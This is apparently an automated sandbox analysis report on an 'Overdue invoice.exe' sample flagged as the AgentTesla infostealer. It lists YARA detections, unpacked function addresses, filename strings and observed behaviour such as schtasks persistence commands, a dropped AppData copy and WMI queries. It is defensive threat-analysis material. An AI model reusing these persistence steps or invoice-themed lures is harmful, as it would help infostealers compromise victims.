                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: Overdue invoice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00524DB10_2_00524DB1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_005228090_2_00522809
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_005259ED0_2_005259ED
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00C2E2D00_2_00C2E2D0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00C2E2E00_2_00C2E2E0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00C2BA740_2_00C2BA74
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027319C00_2_027319C0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027310580_2_02731058
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027310480_2_02731048
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027317400_2_02731740
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027317300_2_02731730
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027319B00_2_027319B0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731C830_2_02731C83
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731C880_2_02731C88
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726D6880_2_0726D688
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072655300_2_07265530
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072664200_2_07266420
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264B680_2_07264B68
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726C2680_2_0726C268
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268AB00_2_07268AB0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072632F00_2_072632F0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072642C80_2_072642C8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072637510_2_07263751
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072637580_2_07263758
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264FB90_2_07264FB9
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264FC80_2_07264FC8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072696250_2_07269625
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072696480_2_07269648
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072686480_2_07268648
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072686580_2_07268658
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072655200_2_07265520
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726CD880_2_0726CD88
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072684680_2_07268468
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072684580_2_07268458
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072663290_2_07266329
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072663690_2_07266369
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264B580_2_07264B58
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072683C80_2_072683C8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726424D0_2_0726424D
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268AA10_2_07268AA1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072672C80_2_072672C8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072672D80_2_072672D8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726E0780_2_0726E078
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072688E80_2_072688E8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072688D80_2_072688D8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 5_2_002F59ED5_2_002F59ED
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 5_2_002F28095_2_002F2809
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 5_2_002F4DB15_2_002F4DB1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_00FE4DB17_2_00FE4DB1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_00FE59ED7_2_00FE59ED
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_00FE28097_2_00FE2809
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016DF0A07_2_016DF0A0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016DF3E87_2_016DF3E8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016D61407_2_016D6140
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EBB187_2_064EBB18
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EC8787_2_064EC878
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EF8307_2_064EF830
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E1FF87_2_064E1FF8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E00407_2_064E0040
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E00067_2_064E0006
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6ACA87_2_06C6ACA8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C66BF07_2_06C66BF0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C686087_2_06C68608
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C644F87_2_06C644F8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C61D287_2_06C61D28
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C633307_2_06C63330
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C641D17_2_06C641D1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_008D59ED15_2_008D59ED
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_008D280915_2_008D2809
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_008D4DB115_2_008D4DB1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_02C6E2DB15_2_02C6E2DB
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_02C6E2E015_2_02C6E2E0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_02C6BA7415_2_02C6BA74
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF193815_2_04CF1938
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF1C0015_2_04CF1C00
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF15F015_2_04CF15F0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF16A915_2_04CF16A9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF16B815_2_04CF16B8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF0FC315_2_04CF0FC3
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF0FD015_2_04CF0FD0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF192B15_2_04CF192B
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF1BF315_2_04CF1BF3
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364B6815_2_07364B68
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736C26815_2_0736C268
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368AB015_2_07368AB0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736D68815_2_0736D688
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073632F015_2_073632F0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073642C815_2_073642C8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736553015_2_07365530
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736642015_2_07366420
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736632915_2_07366329
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364F6115_2_07364F61
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736636915_2_07366369
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736375315_2_07363753
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736375815_2_07363758
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364B5815_2_07364B58
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364FB915_2_07364FB9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364FC815_2_07364FC8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736962515_2_07369625
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736865815_2_07368658
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736424D15_2_0736424D
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736964815_2_07369648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736864815_2_07368648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368AA115_2_07368AA1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073672D815_2_073672D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073672C915_2_073672C9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736552015_2_07365520
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736CD8815_2_0736CD88
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736E07815_2_0736E078
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736846815_2_07368468
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736845815_2_07368458
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073688E815_2_073688E8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073688D815_2_073688D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0083280916_2_00832809
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_008359ED16_2_008359ED
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_00834DB116_2_00834DB1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_012CE2E016_2_012CE2E0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_012CE2D016_2_012CE2D0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_012CBA7416_2_012CBA74
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194B6816_2_07194B68
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719C26816_2_0719C268
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719D68816_2_0719D688
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198AB016_2_07198AB0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071942C816_2_071942C8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071932F016_2_071932F0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719553016_2_07195530
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719642016_2_07196420
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719632916_2_07196329
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719375816_2_07193758
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194B5816_2_07194B58
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719375316_2_07193753
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719636916_2_07196369
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194F6116_2_07194F61
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194FB916_2_07194FB9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194FC816_2_07194FC8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719962516_2_07199625
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719865816_2_07198658
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719964816_2_07199648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719864816_2_07198648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719424D16_2_0719424D
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198AA116_2_07198AA1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071972D816_2_071972D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071972C916_2_071972C9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719552016_2_07195520
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719CD8816_2_0719CD88
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719845816_2_07198458
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719E07816_2_0719E078
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719846816_2_07198468
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071988D816_2_071988D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071988E816_2_071988E8
                    Source: Overdue invoice.exe, 00000000.00000000.250199094.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.299437457.0000000002C16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.304201924.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000005.00000002.290997467.0000000000396000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000000.295675285.0000000001086000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.521143332.00000000016E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000003.316115485.0000000006A0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.520543885.00000000014F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue invoice.exe
                    Source: Overdue invoice.exeBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: dYXeRswtYBrq.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: yqWDN.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Overdue invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: dYXeRswtYBrq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: yqWDN.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Overdue invoice.exeVirustotal: Detection: 60%
                    Source: Overdue invoice.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Users\user\Desktop\Overdue invoice.exeJump to behavior
                    Source: Overdue invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Overdue invoice.exe "C:\Users\user\Desktop\Overdue invoice.exe"
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
